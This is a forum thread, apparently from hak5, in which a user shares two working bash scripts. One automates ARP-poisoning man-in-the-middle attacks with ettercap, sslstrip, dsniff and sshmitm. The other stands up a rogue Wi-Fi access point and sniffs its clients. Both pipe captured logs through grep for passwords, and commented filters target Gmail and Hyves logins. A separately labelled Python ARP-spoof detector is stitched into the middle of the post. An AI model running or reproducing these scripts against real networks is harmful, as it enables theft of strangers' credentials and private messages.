Arp Poisoning Script


Junke1990


Hey guys,

Since I was getting tired of doing everything by hand I made a little script to automate the procedure xD

Let me know if something is done wrong or you have suggestions!

#!/bin/bash
# ARP Poisoning
# Created by Junke1990
# Tested with Asus eee 1000h
# 
### required packages ###
# sudo apt-get -y install ettercap python-twisted-web2 dsniff imsniff python
# sslstrip -  google, download, extract and alter path below! 

# init
sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py'
logfolder='ARP-logs/'

# Make sure only root can run our script
if [[ $EUID -ne 0 ]]; then
  echo "This script must be run as root" 1>&2
  exit 1
fi


modprobe tun
sleep 1

# get interface and mac list
i=0 iflist=() maclist=()
while read -r if mac; do 
  iflist[i]=$if
  maclist[i]=$mac
  ((i++))
done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}')

for i in "${!iflist[@]}"; do
  echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
done
echo -n "Select your interface to ARP poison. [#] "
read j
int=${iflist[j]}

echo -n "IP address of victim: [x.x.x.x]/[a]"
read vic

# info inet conn
int_IP=`ifconfig $int | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`
int_gw=`route -n | awk '{ print $2}' |grep -v '0.0.0.0' | sed -n "3 p"`
int_bc=`ifconfig $int | grep 'Bcast:'|cut -d: -f3 | awk '{ print $1}'`

# lowest IP
oct4=`echo ${int_gw} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`
oct4=$((oct4+1))
int_a=`echo $int_gw | cut -d. -f1,2,3`
int_a="$int_a.$oct4"

# highest IP
oct4=`echo $int_bc | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`
int_b=$((oct4-1))

# range
int_range="$int_a-$int_b"

# determine victim
if [ $vic = "a" ]; then
  vic=$int_range;
fi

# iptables
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

# ettercap TCP Ports
# IMAP  - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS)
# POP3  - 110/TCP 995/TCP
# SMTP  - 25/TCP 465/TCP
# SSL   - 443/TCP
# HTTP  - 80/TCP
# SSH   - 22/TCP
# MSN   - 1863/TCP
# Yahoo - 5050/TCP - nobody interesting uses yahoo...
# ICQ   - 5190/TCP - nobody at all uses ICQ xD

xterm -e ettercap -T -P autoadd -i $int -L ettercap.log -m ettercap.msg.log -l ettercap.info.log -w ettercap.pcap -M arp /$int_gw/ /$vic/22,25,80,110,143,220,443,465,993,995 &

### python-twisted-web2 required!!!
if [ -f $sslstrip ]; then
  xterm -title sslstrip -e python $sslstrip -s -f -k -l 8080 &
  sleep 1
  xterm -e tail -f "sslstrip.log" &
  sleep 1
  xterm -e "tail -f sslstrip.log |grep -i 'pass' "& 

  # filters - not fully tested!
  # xterm -title HYVES -e "tail -f sslstrip.log |grep 'auth_username' | sed 's/.*auth_username=/user=/' | sed 's/\&/ /g' | awk '{print $1 $2}'"&
  # xterm -title GMAIL -e "tail -f sslstrip.log |grep Passwd |  sed 's/.*Email=/Email=/' | sed 's/\&/ /g' | awk '{print $1 $2 }'"&
else 
  echo "sslstrip not found."
  echo 'Edit $sslstrip to the correct path.'
fi

# DSniff
if which dsniff >/dev/null; then
  xterm -e dsniff -i $int -m -w dsniff.log &   
fi

# IMSniff - MSN only
if which imsniff >/dev/null; then
  if [ ! -d 'IMlog' ]; then
    mkdir IMlog
  fi
  # gives a lot of unknown content err's
  xterm -e "imsniff -cd IMlog $int |grep -i -v 'unknown'"& 
fi

# MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo
if which msgsnarf >/dev/null; then
  xterm -e msgsnarf -i $int &   
fi


### SINGLE VICTIM ONLY ###
# SSH mitm
if which sshmitm >/dev/null; then
  if [ $vic != "a" ]; then
    xterm -e sshmitm -I $vic &   
  fi
fi

# ip_forward
# as last to avoid reset
echo "1" > /proc/sys/net/ipv4/ip_forward
chk=`cat /proc/sys/net/ipv4/ip_forward`
if [ $chk != "1" ]; then
  echo "Can't enable ip_forward"
fi

edit: updated the script

Edited by Junke1990
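Because the script above makes one MAC answer for the gateway IP and for a whole range of victim IPs at once, a defender can recognise such a run from the ARP traffic alone. The following is an added Python example, not part of the forum post; it works on a constructed list of ARP replies and assumes a gateway address of 192.168.1.1:

```python
"""Flag ARP-cache poisoning from a stream of ARP replies.

Two signals: (1) an IP, especially the gateway's, suddenly maps to a new
MAC; (2) one MAC claims several IPs, which is what an ARP MITM against a
gateway plus a victim range looks like on the wire.  Added defensive
example; the reply list below is constructed, not a real capture."""
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"      # assumed gateway of the sample LAN
MANY_IPS_THRESHOLD = 3          # one MAC claiming this many IPs is suspect

# Constructed (sender_ip, sender_mac) pairs as seen in ARP "is-at" replies.
SAMPLE_ARP_REPLIES = [
    ("192.168.1.1", "00:11:22:33:44:01"),   # genuine gateway
    ("192.168.1.20", "00:11:22:33:44:20"),  # an ordinary client
    ("192.168.1.1", "de:ad:be:ef:00:01"),   # gateway IP now claimed elsewhere
    ("192.168.1.20", "de:ad:be:ef:00:01"),  # same MAC also claims the client
    ("192.168.1.21", "de:ad:be:ef:00:01"),  # and a third address
]


def analyze(replies, gateway_ip=GATEWAY_IP, threshold=MANY_IPS_THRESHOLD):
    """Return a list of alert strings for the given ARP reply stream."""
    ip_to_mac = {}                 # last MAC seen for each IP
    mac_to_ips = defaultdict(set)  # every IP each MAC has claimed
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            # A gateway flip is the classic sign of a MITM; treat it as critical.
            severity = "CRITICAL" if ip == gateway_ip else "WARNING"
            alerts.append(f"{severity}: {ip} changed from {previous} to {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) == threshold:
            alerts.append(f"WARNING: {mac} now claims {threshold} IPs: "
                          + ", ".join(sorted(mac_to_ips[mac])))
    return alerts


if __name__ == "__main__":
    for line in analyze(SAMPLE_ARP_REPLIES):
        print(line)
```

On a real network the same logic can be fed from a sniffer filtered to ARP opcode 2, or compared against a static table of known gateway MACs.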


God damnit, I made one too around the same time but posted it a few weeks after, hehe.

http://www.hak5.org/forums/index.php?showtopic=16158

my ettercap command is rather standard, just

ettercap -T -i interface -q -M arp:remote /gateway/ /target/

Do you know off the top of your head if that command monitors all ports by default? You've specified a lot in your script, so I guess mine only monitors port 80. I'll have to look into it.


I honestly don't know, I'm not that big of an expert when it comes to ettercap. I did update the script to make it easier. But it is still a work in progress.

I have a Soft AP script too; if you want, I can put it up here as well. It is based on this one but has a few other features, since you are actually in the middle of the traffic.


If you have any suggestions, please let me know!

#!/bin/bash
# SoftAP for wireless-testing
# Created/Modded by Junke1990
#
# Hardware: Eee PC 1000h 
# NICs
#  eth0     (LAN)  
#  ra0         (WLAN)        rt2860STA
#  wlan1     (USB WLAN)    RTL8170L    # dealextreme sku.27963 

# init
sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py'

# services
dsn=0 # Dsniff
ims=0 # IMsniff
msg=0 # MSGsnarf
url=0 # URLsnarf

ssllog1=0 # tail sslstrip.log
ssllog2=0 # tail sslstrip.log |grep pass

# Make sure only root can run our script
if [[ $EUID -ne 0 ]]; then
  echo "This script must be run as root" 1>&2
  exit 1
fi

modprobe tun
sleep 1

echo "[>] Starting: Soft AP - Junke1990"
# get interface and mac list
i=0 iflist=() maclist=()
while read -r if mac; do 
  iflist[i]=$if
  maclist[i]=$mac
  ((i++))
done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}')

for i in "${!iflist[@]}"; do
  echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
done
echo -n "[?] Select your inet conn. [#] "
read j
intI=${iflist[j]}

# select SoftAP adapter
for i in "${!iflist[@]}"; do
  if [ $j != $i ]; then
    echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
  fi
done
echo -n "[?] Select your SoftAP adapter. [#] "
read j
intAP=${iflist[j]}

# MAC address
intAP_MAC=${maclist[j]}

echo "[+] Gathering network info..."
# info inet conn
intI_IP=`ifconfig $intI | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`
intI_DNS=`cat /etc/resolv.conf | sed -n "2 p" | awk '{ print $2}'`
intI_gw=`route -n | awk '{ print $2}' | grep -v '0.0.0.0' | sed -n "3 p"`
intI_mask=`ifconfig $intI | grep 'Mask:' | grep -v '0.0.0.0' | awk '{ print $4}' | cut -d: -f2`
intI_netw=`route -n | grep $intI_mask | cut -d' ' -f1 | head -n 1`

# converting netmask in to netmask length
echo "[+] Calc'ing network mask..."
NETMASK=$intI_mask
MASK1=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\1/'`
MASK2=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\2/'`
MASK3=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\3/'`
MASK4=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`

BM1=`echo -e "obase=2; ${MASK1}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM2=`echo -e "obase=2; ${MASK2}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM3=`echo -e "obase=2; ${MASK3}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM4=`echo -e "obase=2; ${MASK4}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`

MASK=$(( BM1 + BM2 + BM3 + BM4))
intI_mask_nb=$MASK

# enter wireless essid name
echo -n "[?] Enter the desired name for wireless network: "; read ssid

# prepare interface / softap
#wlanconfig $intAP destroy
#wlanconfig $intAP create wlanmode mon wlandev wifi0
if [ `echo $intAP || grep 'mon' ` ]; then
 intAP=`airmon-ng start $intAP |grep "monitor mode " | awk '{ print $5 }' |sed 's/)//'`;
fi

echo "[+] Setting up fake AP...";
sleep 1;
# to enable wep add: -W 1 -w "1234567890" -a $intAP_MAC
xterm -geometry 75x15 -e airbase-ng -c 6 -e "$ssid" $intAP &
sleep 1;
ifconfig at0 up
ifconfig at0 192.168.3.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net $intI_netw netmask $intI_mask gw $intI_gw
route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1

# monitor
#xterm -e airodump-ng -c 6 --bssid $intAP_MAC $intAP &
#xterm -e tshark -i 3 "not broadcast and not multicast" & # at0 = 3

echo "[+] Killing dhcpd..."
# do this quiet for when the process isn't running
killall -q dhcpd3

echo "[+] Setting up DHCP config..."
# create custom dhcpd.conf for WLAN
DHCPDCONF='';
cat > dhcpd.conf << EOF
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.3.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.3.255;
option routers 192.168.3.1;
EOF

### Submitted by ToomSec
for d in $(cat /etc/resolv.conf | sed -r 's/^.* ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}).*$/\1/' | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')
  do
      echo "option domain-name-servers $d;" >> dhcpd.conf
  done

cat >> dhcpd.conf << EOF
range 192.168.3.10 192.168.3.254;
}
EOF

echo "[+] Cleaning up IP tables..."
# iptables cleanup
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Setting up forwarding tables..."
# iptables
#iptables -t nat -A PREROUTING -p udp -j DNAT --to $intI_gw # all udp traffic
#iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $intI_DNS # DNS only
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080  # send stuff to sslstrip
iptables -A FORWARD --in-interface at0 -j ACCEPT # rogue gateway
iptables -t nat -A POSTROUTING --out-interface $intI -j MASQUERADE # gateway to ext. router
#iptables -t nat -A PREROUTING -s 192.168.3.0/24 -d $intI_netw/$intI_mask_nb -j DROP # protect LAN from WLAN
# ip fwd enable 
echo 1 > /proc/sys/net/ipv4/ip_forward

# start dhcp server for subnet
# edit /etc/apparmor.d/usr.sbin.dhcp3 to allow dhcpd to read the config file if it keeps giving permission denied
echo "[+] Setting up DHCP server..."
xterm -geometry 75x10 -T DHCP -e dhcpd3 -d -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &

### python-twisted-web2 required!!!
if [ -f $sslstrip ]; then
  echo "[+] Setting up sslstrip..."
  xterm -geometry 45x5 -e python $sslstrip -a -k -f -l 8080 &
  if [ $ssllog1 == 1 ]; then xterm -e tail -f sslstrip.log & fi
  if [ $ssllog2 == 1 ]; then xterm -e "tail -f sslstrip.log |grep 'pass' "& fi
  sleep 1
else 
  echo "[-] SSLStrip not found..."
  echo 'Edit $sslstrip to the correct path.'
fi


# DSniff
if [ $dsn == 1 ]; then 
  if which dsniff >/dev/null; then
    echo "[+] Setting up dsniff..."
    xterm -e dsniff -i at0 -m &   
    sleep 1
  fi
fi

# IMSniff - MSN only
if [ $ims == 1 ]; then 
  if which imsniff >/dev/null; then
    echo "[+] Setting up IMSniff..."
    if [ ! -d 'IMlog' ]; then
      mkdir IMlog
    fi
    # gives a lot of unknown content err's
    xterm -e "imsniff -cd IMlog at0 |grep -i -v 'unknown'"& 
    sleep 1
  fi
fi

# MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo
if [ $msg == 1 ]; then 
  if which msgsnarf >/dev/null; then
    echo "[+] Setting up MSGsnarf..."
    xterm -e msgsnarf -i at0 &    
    sleep 1
  fi
fi

# URLSnarf
if [ $url == 1 ]; then
  if which urlsnarf >/dev/null; then
    echo "[+] Setting up URLsnarf..."
    xterm -e urlsnarf -i at0 &
    sleep 1
  fi
fi

# ettercap TCP Ports
# IMAP  - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS)
# POP3  - 110/TCP 995/TCP
# SMTP  - 25/TCP 465/TCP
# SSL   - 443/TCP
# HTTP  - 80/TCP
# SSH   - 22/TCP
# MSN   - 1863/TCP
# Yahoo - 5050/TCP - nobody interesting uses yahoo...
# ICQ   - 5190/TCP - nobody at all uses ICQ xD

echo "[+] Setting up ettercap..."
#xterm -e ettercap -T -i at0 -P autoadd -l ettercap -w ettercap.pcap -M arp /192.168.3.1/ /192.168.3.10-254/22,25,80,110,143,220,443,465,993,995,1863 &

### Submitted by ToomSec
#ettercap -T -q -p -u -z -m ${LOGFOLDER}ettercap_evilap.log -i $wint >> $LOGFILE 2>&1
xterm -e ettercap -T -q -p -u -z -m ettercap_evilap.log -i at0 &
sleep 1

# ip_forward
# as last to avoid reset
echo "[+] Enabling IP forward..."
echo "1" > /proc/sys/net/ipv4/ip_forward
chk=`cat /proc/sys/net/ipv4/ip_forward`
if [ $chk != "1" ]; then
  echo "[-] Can NOT enable ip_forward..."
fi

echo "[x] All done! have fun!"
